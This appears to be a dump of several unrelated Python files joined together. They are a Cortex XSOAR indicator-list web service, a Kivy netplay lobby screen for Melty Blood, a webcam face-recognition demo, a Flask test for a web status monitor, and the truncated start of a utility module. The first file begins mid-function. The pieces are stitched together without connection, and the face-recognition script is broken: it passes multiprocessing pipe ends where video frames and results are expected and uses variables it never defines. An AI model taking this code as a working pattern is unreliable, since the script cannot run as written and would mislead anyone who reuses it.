panos_compatible: bool = True, url_port_stripping: bool = True) -> str:
"""
Refresh the cache values and format using an indicator_query to call demisto.searchIndicators
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
panos_compatible (bool): Whether to make the indicators PANOS compatible or not
url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not
Returns: List(IoCs in output format)
"""
now = datetime.now()
# poll indicators into edl from demisto
iocs = find_indicators_to_limit(indicator_query, limit, panos_compatible, url_port_stripping)
out_dict = create_values_out_dict(iocs)
save_context(now, out_dict)
return out_dict[EDL_VALUES_KEY]
def save_context(now: datetime, out_dict: dict):
"""Saves EDL state and refresh time to context"""
demisto.setLastRun({'last_run': date_to_timestamp(now)})
demisto.setIntegrationContext(out_dict)
def find_indicators_to_limit(indicator_query: str, limit: int,
panos_compatible: bool = True, url_port_stripping: bool = False) -> list:
"""
Finds indicators using demisto.searchIndicators
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
panos_compatible (bool): Whether to make the indicators PANOS compatible or not
url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not
Returns:
list: The IoCs list up until the amount set by 'limit'
"""
iocs, _ = find_indicators_to_limit_loop(indicator_query, limit,
panos_compatible=panos_compatible,
url_port_stripping=url_port_stripping)
return iocs[:limit]
def find_indicators_to_limit_loop(indicator_query: str, limit: int, total_fetched: int = 0,
next_page: int = 0, last_found_len: int = PAGE_SIZE,
panos_compatible: bool = True, url_port_stripping: bool = False):
"""
Finds indicators using while loop with demisto.searchIndicators, and returns result and last page
Parameters:
indicator_query (str): Query that determines which indicators to include in
the EDL (Cortex XSOAR indicator query syntax)
limit (int): The maximum number of indicators to include in the EDL
total_fetched (int): The amount of indicators already fetched
next_page (int): The page we are up to in the loop
last_found_len (int): The amount of indicators found in the last fetch
panos_compatible (bool): Whether to make the indicators PANOS compatible or not
url_port_stripping (bool): Whether to strip the port from URL indicators (if a port is present) or not
Returns:
(tuple): The iocs and the last page
"""
iocs: List[dict] = []
if not last_found_len:
last_found_len = total_fetched
while last_found_len == PAGE_SIZE and limit and total_fetched < limit:
formatted_iocs = []
fetched_iocs = demisto.searchIndicators(query=indicator_query, page=next_page, size=PAGE_SIZE).get('iocs', [])
if panos_compatible or url_port_stripping:
for ioc in fetched_iocs:
ioc_value = ioc.get('value', '')
if url_port_stripping:
ioc_value = _PORT_RE.sub(_URL_WITHOUT_PORT, ioc_value)
if panos_compatible:
# protocol stripping
ioc_value = _PROTOCOL_RE.sub('', ioc_value)
# mix of text and wildcard in domain field handling
ioc_value = _INVALID_TOKEN_RE.sub('*', ioc_value)
# for PAN-OS *.domain.com does not match domain.com
# we should provide both
# this could generate more than num entries according to PAGE_SIZE
if ioc_value.startswith('*.'):
ioc_object_copy = deepcopy(ioc)
ioc_object_copy['value'] = ioc_value.lstrip('*.')
formatted_iocs.append(ioc_object_copy)
ioc['value'] = ioc_value
formatted_iocs.append(ioc)
iocs.extend(formatted_iocs)
else:
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
next_page += 1
return iocs, next_page
def create_values_out_dict(iocs: list) -> dict:
"""
Create a dictionary for output values
"""
formatted_indicators = []
for ioc in iocs:
value = ioc.get('value')
if value:
formatted_indicators.append(value)
return {EDL_VALUES_KEY: list_to_str(formatted_indicators, '\n')}
def get_edl_ioc_values(on_demand, limit, indicator_query='', last_run=None, cache_refresh_rate=None,
panos_compatible: bool = True, url_port_stripping: bool = False) -> str:
"""
Get the ioc list to return in the edl
"""
# on_demand ignores cache
if on_demand:
values_str = get_ioc_values_str_from_context()
else:
if last_run:
cache_time, _ = parse_date_range(cache_refresh_rate, to_timestamp=True)
if last_run <= cache_time:
values_str = refresh_edl_context(indicator_query, limit=limit,
panos_compatible=panos_compatible,
url_port_stripping=url_port_stripping)
else:
values_str = get_ioc_values_str_from_context()
else:
values_str = refresh_edl_context(indicator_query, limit=limit,
panos_compatible=panos_compatible,
url_port_stripping=url_port_stripping)
return values_str
def get_ioc_values_str_from_context() -> str:
"""
Extracts output values from cache
"""
cache_dict = demisto.getIntegrationContext()
return cache_dict.get(EDL_VALUES_KEY, '')
def try_parse_integer(int_to_parse: Any, err_msg: str) -> int:
"""
Tries to parse an integer, and if fails will throw DemistoException with given err_msg
"""
try:
res = int(int_to_parse)
except (TypeError, ValueError):
raise DemistoException(err_msg)
return res
def validate_basic_authentication(headers: dict, username: str, password: str) -> bool:
"""
Checks whether the authentication is valid.
:param headers: The headers of the http request
:param username: The integration's username
:param password: The integration's password
:return: Boolean which indicates whether the authentication is valid or not
"""
credentials: str = headers.get('Authorization', '')
if not credentials or 'Basic ' not in credentials:
return False
encoded_credentials: str = credentials.split('Basic ')[1]
credentials: str = b64decode(encoded_credentials).decode('utf-8')
if ':' not in credentials:
return False
credentials_list = credentials.split(':')
if len(credentials_list) != 2:
return False
user, pwd = credentials_list
return user == username and pwd == password
''' ROUTE FUNCTIONS '''
@APP.route('/', methods=['GET'])
def route_edl_values() -> Response:
"""
Main handler for values saved in the integration context
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if username and password:
headers: dict = cast(Dict[Any, Any], request.headers)
if not validate_basic_authentication(headers, username, password):
err_msg: str = 'Basic authentication failed. Make sure you are using the right credentials.'
demisto.debug(err_msg)
return Response(err_msg, status=401)
panos_compatible: bool = params.get('panos_compatible', False)
url_port_stripping: bool = params.get('url_port_stripping', False)
values = get_edl_ioc_values(
on_demand=params.get('on_demand'),
limit=try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG),
last_run=demisto.getLastRun().get('last_run'),
indicator_query=params.get('indicators_query'),
cache_refresh_rate=params.get('cache_refresh_rate'),
panos_compatible=panos_compatible,
url_port_stripping=url_port_stripping
)
return Response(values, status=200, mimetype='text/plain')
''' COMMAND FUNCTIONS '''
def test_module(args, params):
"""
Validates:
1. Valid port.
2. Valid cache_refresh_rate
"""
get_params_port(params)
on_demand = params.get('on_demand', None)
if not on_demand:
try_parse_integer(params.get('edl_size'), EDL_LIMIT_ERR_MSG) # validate EDL Size was set
query = params.get('indicators_query') # validate indicators_query isn't empty
if not query:
raise ValueError('"Indicator Query" is required. Provide a valid query.')
cache_refresh_rate = params.get('cache_refresh_rate', '')
if not cache_refresh_rate:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
# validate cache_refresh_rate value
range_split = cache_refresh_rate.split(' ')
if len(range_split) != 2:
raise ValueError(EDL_MISSING_REFRESH_ERR_MSG)
try_parse_integer(range_split[0], 'Invalid time value for the Refresh Rate. Must be a valid integer.')
if not range_split[1] in ['minute', 'minutes', 'hour', 'hours', 'day', 'days', 'month', 'months', 'year',
'years']:
raise ValueError(
'Invalid time unit for the Refresh Rate. Must be minutes, hours, days, months, or years.')
parse_date_range(cache_refresh_rate, to_timestamp=True)
run_long_running(params, is_test=True)
return 'ok', {}, {}
def run_long_running(params, is_test=False):
"""
Start the long running server
:param params: Demisto params
:param is_test: Indicates whether it's test-module run or regular run
:return: None
"""
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
certificate_path = str()
private_key_path = str()
try:
port = get_params_port(params)
ssl_args = dict()
if (certificate and not private_key) or (private_key and not certificate):
raise DemistoException('If using HTTPS connection, both certificate and private key should be provided.')
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
demisto.error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def update_edl_command(args, params):
"""
Updates the EDL values and format on demand
"""
on_demand = demisto.params().get('on_demand')
if not on_demand:
raise DemistoException(
'"Update EDL On Demand" is off. If you want to update the EDL manually please toggle it on.')
limit = try_parse_integer(args.get('edl_size', params.get('edl_size')), EDL_LIMIT_ERR_MSG)
print_indicators = args.get('print_indicators')
query = args.get('query')
indicators = refresh_edl_context(query, limit=limit)
hr = tableToMarkdown('EDL was updated successfully with the following values', indicators,
['Indicators']) if print_indicators == 'true' else 'EDL was updated successfully'
return hr, {}, indicators
def main():
"""
Main
"""
params = demisto.params()
credentials = params.get('credentials') if params.get('credentials') else {}
username: str = credentials.get('identifier', '')
password: str = credentials.get('password', '')
if (username and not password) or (password and not username):
err_msg: str = 'If using credentials, both username and password should be provided.'
demisto.debug(err_msg)
raise DemistoException(err_msg)
command = demisto.command()
demisto.debug('Command being called is {}'.format(command))
commands = {
'test-module': test_module,
'edl-update': update_edl_command
}
try:
if command == 'long-running-execution':
run_long_running(params)
else:
readable_output, outputs, raw_response = commands[command](demisto.args(), params)
return_outputs(readable_output, outputs, raw_response)
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
lobbyscreen.py | from mbaacc import MOON
from json.decoder import JSONDecodeError
import time
import requests
import threading
import pyperclip
from functools import partial
from config import *
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import Screen
from ui.modals import *
from ui.buttons import DummyBtn, PlayerRow
import presence
import logging
from ui.playerwiki import *
class LobbyScreen(Screen):
active_pop = None # active popup on the screen
player_list = ObjectProperty(None) # layout for players
challenge_list = ObjectProperty(None) # layout for players
match_list = ObjectProperty(None) # layout for players
lobby_code = ObjectProperty(None) # layout for players
def __init__(self, CApp, **kwargs):
super(LobbyScreen, self).__init__(**kwargs)
self.app = CApp
self.secret = None # secret required for server messages
self.lobby_thread_flag = 0 #whether or not the thread is running
self.watch_player = None # id of player to watch for spectating, TODO
self.player_id = None # our own ID as provided by the JSON
self.code = None # lobby code
self.lobby_updater = None # thread to manage lobby updates
self.widget_index = {} #ids of players, widget of lobby
self.error = False
self.challenge_name = None #name of player being challenged
self.opponent = None # name of player currently being played against
self.challenge_id = None #id of player being challenged
self.type = None
self.get_attempts = 0 #if 2, exit
self.alias = None #lobby alias if any
def create(self, j, first=False, type='Private'): # json response object
print(j)
#this does not use self.type because it should only run once per lobby.
#the reason for this is that a player may start a Direct Online match separately and we do not want to erase that status.
#self.type is used for update_stats in the Caster function to signal info to the presence.
newSound = False
if first:
self.player_id = j['msg']
self.code = j['id']
if j['alias']:
self.alias = j['alias']
self.lobby_code.text = "[Lobby Code %s]" % self.alias
else:
self.lobby_code.text = "[%s Lobby Code %s]" % (type, self.code)
self.widget_index = {}
self.player_list.clear_widgets()
self.match_list.clear_widgets()
self.challenge_list.clear_widgets()
self.type = type
if self.app.discord is True:
if type.lower() == 'public':
self.app.mode = 'Public Lobby'
presence.public_lobby(self.code)
elif type.lower() == 'private':
self.app.mode = 'Private Lobby'
presence.private_lobby()
self.app.game.update_stats(once=True)
challenging_ids = []
# TODO: come up with a solution for players with identical names (this does not affect the server )
if j['challenges'] != []:
if 'c' not in self.widget_index:
h = DummyBtn()
h.text = 'Challenges (click to accept)'
self.challenge_list.add_widget(h)
self.widget_index.update({'c':h})
for i in j['challenges']: # name, id, ip of challenger
challenging_ids.append(i[1])
if i[1] in self.widget_index:
if self.widget_index.get(i[1]).parent == self.challenge_list:
pass
else: #remove idle player
self.widget_index.get(i[1]).parent.remove_widget(self.widget_index.get(i[1]))
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
p.ids['PlayerBtn'].bind(on_release=partial(
self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
p.ids['WatchBtn'].text = ""
self.challenge_list.add_widget(p)
self.widget_index.update({i[1]:p})
if newSound is False:
self.app.sound.play_alert()
newSound = True
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
p.ids['PlayerBtn'].bind(on_release=partial(
self.accept_challenge, name=i[0], id=i[1], ip=i[2]))
p.ids['WatchBtn'].text = ""
self.challenge_list.add_widget(p)
self.widget_index.update({i[1]:p})
if newSound is False:
self.app.sound.play_alert()
newSound = True
else:
n = []
for k,v in self.widget_index.items():
if v in self.challenge_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
if j['idle'] != []:
if 'i' not in self.widget_index:
h = DummyBtn()
h.text = 'Idle players (click to challenge)'
self.player_list.add_widget(h)
self.widget_index.update({'i':h})
for i in j['idle']:
if i[1] not in challenging_ids:
if i[1] in self.widget_index:
pass
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = i[0]
if i[1] != self.player_id:
p.ids['PlayerBtn'].bind(on_release=partial(
self.send_challenge, name=i[0], id=i[1]))
if i[1] == self.watch_player:
p.ids['WatchBtn'].text = 'FOLLOWING'
else:
p.ids['WatchBtn'].text = 'FOLLOW'
p.ids['WatchBtn'].bind(on_release=partial(self.follow_player, i=i[1]))
else:
p.ids['PlayerBtn'].text += " (self)"
p.ids['WatchBtn'].disabled = True
p.ids['WatchBtn'].text = ""
self.player_list.add_widget(p)
self.widget_index.update({i[1]:p})
else:
n = []
for k,v in self.widget_index.items():
if v in self.player_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
if j['playing'] != []:
if 'w' not in self.widget_index:
h = DummyBtn()
h.text = 'Now playing (click to watch)'
self.match_list.add_widget(h)
self.widget_index.update({'w':h})
for i in j['playing']:
if (i[2],i[3]) in self.widget_index or (i[3],i[2]) in self.widget_index:
pass
else:
p = PlayerRow()
p.ids['PlayerBtn'].text = "%s vs %s" % (i[0], i[1])
if i[2] != self.player_id and i[3] != self.player_id:
p.ids['PlayerBtn'].bind(on_release=partial(self.watch_match,
name="%s vs %s" % (i[0], i[1]), ip=i[4]))
p.ids['WatchBtn'].text = ""
self.match_list.add_widget(p)
self.widget_index.update({(i[2],i[3]):p})
if i[2] == self.watch_player or i[3] == self.watch_player:
self.watch_match(name="%s vs %s" % (i[0], i[1]), ip=i[4])
else:
n = []
for k,v in self.widget_index.items():
if v in self.match_list.children:
v.parent.remove_widget(v)
n.append(k)
for i in n:
self.widget_index.pop(i)
#if any widgets in the list don't correspond to json items, remove them
n = []
for k in self.widget_index.keys():
ok = False
if k != 'w' and k != 'c' and k != 'i':
for i in j['challenges']:
if k == i[1]:
ok = True
for i in j['idle']:
if k == i[1]:
ok = True
for i in j['playing']:
if k == (i[2],i[3]) or k == (i[3],i[2]):
ok = True
if ok is False:
n.append(k)
for i in n:
self.widget_index.get(i).parent.remove_widget(self.widget_index.get(i))
self.widget_index.pop(i)
if first:
self.app.lobby_button()
self.lobby_thread_flag = 0
self.lobby_updater = threading.Thread(
target=self.auto_refresh, daemon=True) # netplay watchdog
self.lobby_updater.start()
else:
if len(self.challenge_list.children) > 0:
self.app.update_lobby_button('LOBBY %s (%s)' % (self.code,len(self.challenge_list.children) - 1))
else:
self.app.update_lobby_button('LOBBY %s ' % self.code)
def follow_player(self,obj,i):
w = self.widget_index.get(i).ids['WatchBtn']
if w.text == 'FOLLOW':
self.watch_player = i
for k,v in self.widget_index.items(): # clear first
try:
if v.parent == self.player_list and k != self.player_id:
v.ids['WatchBtn'].text = 'FOLLOW'
except KeyError:
pass
w.text = 'FOLLOWING'
else:
self.watch_player = None
w.text = 'FOLLOW'
def auto_refresh(self):
net = requests.Session()
while True:
if self.lobby_thread_flag != 0:
break
p = {
'action': 'status',
'id': self.code,
'p': self.player_id,
'secret': self.secret
}
try:
req = net.get(url=LOBBYURL, params=p, timeout=5)
req.raise_for_status()
except (requests.exceptions.ConnectionError,requests.exceptions.Timeout) as e:
logging.warning('LOBBY REFRESH: %s' % e.__class__)
if self.get_attempts < 2:
self.get_attempts += 1
logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
else:
logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
self.exit(msg='Error: %s' % e.__class__)
break
else:
r = req.json()
if r['msg'] == 'OK':
self.create(r)
time.sleep(2)
else:
self.exit(msg=r['msg'])
break
def exit(self,msg=None):
self.lobby_thread_flag = 1
try:
p = {
'action': 'leave',
'id': self.code,
'p': self.player_id,
'secret': self.secret
}
requests.get(url=LOBBYURL, params=p)
except:
pass
self.secret = None
self.watch_player = None
self.player_id = None
self.code = None
self.alias = None
self.challenge_id = None
self.challenge_name = None
self.type = None
self.lobby_updater = None
self.get_attempts = 0
self.app.remove_lobby_button()
self.app.LobbyList.refresh()
if msg:
popup = GameModal()
popup.modal_txt.text = msg
popup.close_btn.text = 'Close'
popup.close_btn.bind(on_release=popup.dismiss)
popup.open()
# Set Rich Presence to main menu again
if self.app.discord is True:
presence.menu()
self.app.game.update_stats(once=True)
def send_challenge(self, obj, name, id, *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
self.challenge_name = name
self.challenge_id = id
popup = GameModal()
popup.modal_txt.text = 'Challenging %s' % self.challenge_name
popup.close_btn.text = 'Stop Playing'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
self.active_pop = popup
popup.open()
caster = threading.Thread(
target=self.app.game.host, args=[self,app_config['settings']['netplay_port'],"Versus",id], daemon=True)
caster.start()
def set_ip(self,ip=None):
pyperclip.copy('') #erase IP address from clipboard
p = {
't': self.challenge_id,
'p': self.player_id,
'action': 'challenge',
'id': self.code,
'ip': ip,
'secret': self.secret
}
print(p)
c = requests.get(url=LOBBYURL, params=p).json()
print(c)
def accept_challenge(self, obj, name, id, ip, *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
caster = threading.Thread(target=self.app.game.join, args=[
ip, self, id], daemon=True)
caster.start()
threading.Thread(target=self.send_pre_accept,args=[self.player_id,id]).start()
popup = GameModal()
popup.modal_txt.text = 'Connecting to %s' % name
popup.close_btn.text = 'Stop Playing'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
self.active_pop = popup
popup.open()
def send_pre_accept(self,id,target):
p = {
't': target,
'p': id,
'action': 'pre_accept',
'id': self.code,
'secret': self.secret
}
print(p)
c = requests.get(url=LOBBYURL, params=p).json()
print(c)
def confirm(self, obj, r, d, p, n, t=None, *args):
try:
self.app.game.confirm_frames(int(r.text),int(d.text))
self.opponent = n
self.active_pop.modal_txt.text += "\nConnected to: %s, %s Delay & %s Rollback" % (
n, d.text, r.text)
self.active_pop = fill_wiki_button(self,self.active_pop)
p.dismiss()
if t != None: #if accepting, run MBAA check
threading.Thread(target=self.wait_for_MBAA, args=[t]).start()
except ValueError:
pass
def wait_for_MBAA(self, t):
while True:
if self.app.game.playing is True and self.active_pop != None:
if self.app.game.read_memory(0x54EEE8) == 20: #wait for char select
resp = {
't': t,
'p': self.player_id,
'action': 'accept',
'id': self.code,
'secret': self.secret
}
print(resp)
c = requests.get(url=LOBBYURL, params=resp).json()
print(c)
break
else:
continue
else:
break
def watch_match(self, obj=None, name="", ip="", *args):
self.watch_player = None
for k,v in self.widget_index.items():
try:
if k != self.player_id and v.parent == self.player_list:
v.ids['WatchBtn'].text = "FOLLOW"
except KeyError:
pass
popup = GameModal()
caster = threading.Thread(
target=self.app.game.watch, args=[ip,self], daemon=True)
self.active_pop = popup
popup.modal_txt.text = 'Watching %s' % name
popup.close_btn.text = 'Stop watching'
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
popup = fill_wiki_button(self,popup)
popup.open()
self.app.offline_mode = 'Spectating' #needs to be an offline mode for lobby multitasking
caster.start()
def set_frames(self, name, delay, ping, target=None, mode="Versus", rounds=2):
popup = FrameModal()
if rounds != 0:
rounds = ", %s rounds per game" % rounds
else:
rounds = ''
popup.frame_txt.text = '[b]Connected to %s[/b]\n[size=14][u]%s mode%s[/u]\nNetwork delay: %s (%s ms)\nSuggested: Delay %s, Rollback %s[/size]' % (
name, mode, rounds, delay, ping, self.app.game.ds, self.app.game.rs)
popup.r_input.text = str(self.app.game.rs)
popup.d_input.text = str(self.app.game.ds)
popup.start_btn.bind(on_release=partial(
self.confirm, p=popup, r=popup.r_input, d=popup.d_input, n=name, t=target))
popup.close_btn.bind(on_release=partial(
self.dismiss, p=popup))
popup.open()
def error_message(self,e):
self.error = True
popup = GameModal()
for i in e:
popup.modal_txt.text += i + '\n'
popup.close_btn.bind(on_release=partial(self.dismiss_error,p = popup))
popup.close_btn.text = "Close"
if self.active_pop != None:
self.active_pop.dismiss()
self.active_pop = None
popup.open()
def dismiss_error(self,obj,p):
p.dismiss()
self.error = False
# TODO prevent players from dismissing caster until MBAA is open to avoid locking issues
def dismiss(self, obj, p, *args):
self.app.game.kill_caster()
self.challenge_name = None
self.opponent = None
self.challenge_id = None
r = {
'action': 'end',
'p': self.player_id,
'id': self.code,
'secret': self.secret
}
requests.get(url=LOBBYURL, params=r)
p.dismiss()
if self.active_pop != None:
self.active_pop.dismiss()
self.active_pop = None
def invite_link(self,*args):
if self.alias:
pyperclip.copy('https://invite.meltyblood.club/%s' % self.alias)
else:
pyperclip.copy('https://invite.meltyblood.club/%s' % self.code)
threading.Thread(target=self.invite_ui).start()
def invite_ui(self):
if self.lobby_code.text != 'Link copied to clipboard':
t = self.lobby_code.text
self.lobby_code.text = 'Link copied to clipboard'
time.sleep(2)
self.lobby_code.text = t
|
reconhecimento.py | # -*- coding: utf-8 -*-
import multiprocessing
from multiprocessing import Pipe,Process
import multiprocessing.dummy as mp
import face_recognition
import cv2
import time
# This is a demo of running face recognition on live video from your webcam. It's a little more complicated than the
# other example, but it includes some basic performance tweaks to make things run a lot faster:
# 1. Process each video frame at 1/4 resolution (though still display it at full resolution)
# 2. Only detect faces in every other frame of video.
# PLEASE NOTE: This example requires OpenCV (the `cv2` library) to be installed only to read from your webcam.
# OpenCV is *not* required to use the face_recognition library. It's only required if you want to run this
# specific demo. If you have trouble installing it, try any of the other demos that don't require it instead.
# Referencia para a webcam #0 (default)
video_capture = cv2.VideoCapture(0)
# Carrega uma figura e aprende a reconhecer seus padroes.
leleo_image = face_recognition.load_image_file("leleo.jpg")
leleo_face_encoding = face_recognition.face_encodings(leleo_image)[0]
# Carrega uma segunda figura e aprende a reconhecer seus padroes.
bastos_image = face_recognition.load_image_file("bastos.jpg")
bastos_face_encoding = face_recognition.face_encodings(bastos_image)[0]
# Cria um array de faces conhecidas e seus nomes.
global face_names
global known_face_encodings
known_face_encodings = [
leleo_face_encoding,
bastos_face_encoding
]
known_face_names = [
"Leleo",
"Gabriel Bastos"
]
# Inicializa algumas variaveis
#rgb_small_frame
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
tempo_anterior = 0
tempo = 0
#################
# Funcao para usar o multiprocessing do python
def face_match(face_encoding):
# Ver se a face encontrada estรก entre as conhecidas
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Desconhecido"
# Se der um "match" entre a face reconhecida e uma jรก conhecida, usa a primeira.
if True in matches:
first_match_index = matches.index(True)
name = known_face_names[first_match_index]
face_names.append(name)
# Funcao para capturar a imagem
def capture_and_resize(ret,frame,rgb_small_frame):
#global ret
#global frame
#global rgb_small_frame
ret, frame = video_capture.read() # Captura um frame do video
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25) # Redimensiona a imagem para 1/4 da qualidade original para melhorar o tempo de reconhecimento.
rgb_small_frame = small_frame[:, :, ::-1] # Converte do padrao BRG (openCV usa) para o RGB (face_recognition usa).
#
def processar_video(face_names,face_locations):
#global face_names
#global face_locations
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
if __name__ == '__main__':
pool = mp.Pool(2)
pool.map(face_match, face_encodings)
pool.close()
pool.join()
#################
while True:
antes = time.time()
processos = []
# Captura um frame do video
#ret, frame = video_capture.read()
# Redimensiona a imagem para 1/4 da qualidade original para melhorar o tempo de reconhecimento.
#small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Converte do padrao BRG (openCV usa) para RGB (face_recognition usa).
#rgb_small_frame = small_frame[:, :, ::-1]
#capture_and_resize()
parent_frame,frame = Pipe()
parent_ret,ret = Pipe()
parent_rgb_small_frame,rgb_small_frame = Pipe()
p1 = multiprocessing.Process(target=capture_and_resize,args=(ret,frame,rgb_small_frame))
processos.append(p1)
p1.start()
# So processa um frame por vez para economizar tempo
print(parent_frame)
p1.join()
if process_this_frame:
print("processando")
#processar_video()
parent_face_names, face_names = Pipe()
parent_face_locations, face_locations = Pipe()
p2 = multiprocessing.Process(target=processar_video, args=(face_names,face_locations))
processos.append(p2)
p2.start()
#process()
# Procura todas as faces no video
#face_locations = face_recognition.face_locations(rgb_small_frame)
#face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
#face_names = []
#if __name__ == '__main__':
# pool = mp.Pool(2)
# pool.map(face_match, face_encodings)
# pool.close()
# pool.join()
process_this_frame = not process_this_frame
# Mostra os resultados
for (top, right, bottom, left), name in zip(parent_face_locations, parent_face_names):
# Desfaz o tratamento 1/4 que fizemos no inicio
top *= 4
right *= 4
bottom *= 4
left *= 4
if (name=="Desconhecido"):
# Desenha uma caixa em torno da pessoa
cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# Escreve o nome embaixo da caixa
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
else:
# Desenha uma caixa em torno da pessoa
cv2.rectangle(frame, (left, top), (right, bottom), (0, 255, 0), 2)
# Escreve o nome embaixo da caixa
cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 255, 0), cv2.FILLED)
font = cv2.FONT_HERSHEY_DUPLEX
cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# Mostra a imagem resultante
cv2.imshow('Video', frame)
agora = time.time()
diferenca = (agora - antes)
print (diferenca)
# Aperte 'q' para sair!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# Fecha a conexao com a webcam
for processo in processos:
processo.join()
agora = time.time()
diferenca = (agora - antes)
print (diferenca)
video_capture.release()
cv2.destroyAllWindows()
|
test.py | import sys
import time
from multiprocessing import Process
from pprint import pprint
import http.client
import psycopg2
import toml
from flask import Flask
app = Flask(__name__)
SLOW_DELAY = 1.0
@app.route('/hello')
def route_hello():
return 'hello'
@app.route('/fast')
def route_fast():
return 'fast'
@app.route('/slow')
def route_slow():
time.sleep(SLOW_DELAY)
return 'slow'
@app.route('/never')
def route_never():
time.sleep(SLOW_DELAY * 5)
return 'never'
# TODO DRY, Share db and config code with main ...
def load_lines(file_name):
with open(file_name) as f:
return f.readlines()
def with_db_connection(db_config, proc):
with psycopg2.connect(db_config['uri'],
password=load_lines(db_config['password_file'])[0].strip()) as conn:
with conn.cursor() as cur:
return proc(cur)
def normalize_status(row):
"""Return (url, http_status, slow?, content_match?)"""
if row[1] == 0:
assert not row[3]
return row[0], 0, True, False
else:
return row[0], row[1], row[2] >= SLOW_DELAY, row[3]
def test_proc(db_config, delay):
print("Awaiting probes.")
start_at = time.strftime('%Y-%m-%d %H:%M:%SZ', time.gmtime(time.time()))
time.sleep(delay * 3 + 10) # 2 cycles + some time for in-flight messages to settle
def check_statuses(cur):
print(f"Checking db results after {start_at}.")
cur.execute("SELECT url, code, duration, match FROM web_status where timestamp >= %s",
(start_at,))
rows = [row for row in cur]
print(f"Received {len(rows)} records.")
results = set([normalize_status(r) for r in rows])
print("Normalized results:")
pprint(results)
expecting = {('http://10.0.0.5:12321/fast', 0, True, False), # No connection
('http://10.0.0.5:8080/fast', 200, False, True), # OK
('http://10.0.0.5:8080/hello', 200, False, False), # Content mismatch
('http://10.0.0.5:8080/never', 0, True, False), # Timeout
('http://10.0.0.5:8080/newverland', 404, False, False), # 404
('http://10.0.0.5:8080/slow', 200, True, True) # Slow
}
print("Expecting:")
pprint(expecting)
# It could be possible to compare wit '==' to potentially detect more problems.
# But flask is not available immediately, which is already recorded by probe.
# Also there may be other probes running.
# A reliable implementation of '==' comparison would be more complex.
return len(expecting.difference(results)) == 0
return with_db_connection(db_config, check_statuses)
if __name__ == '__main__':
config = toml.load('config/config.toml')
flask = Process(target=lambda: app.run(host='10.0.0.5', port=8080))
try:
flask.start()
if test_proc(config['db'], config['web']['delay_s']):
print("\nTest passed.\n")
else:
print("\nTest failed.\n")
sys.exit(1)
finally:
flask.terminate()
|
__init__.py | import importlib
import os
from os import path
import sys
import time
import math
import collections
import multiprocessing
import imageio
import pickle
import itertools
import torch
import torchvision.utils as vutils
def str2num(string):
'''
Extract a number from the given string
Arg:
'''
return int(''.join(s for s in string if s.isdigit()))
def format_vp(n):
if n == 0:
return '0'
elif abs(n) < 1e-4:
return '{:.1g}'.format(n)
else:
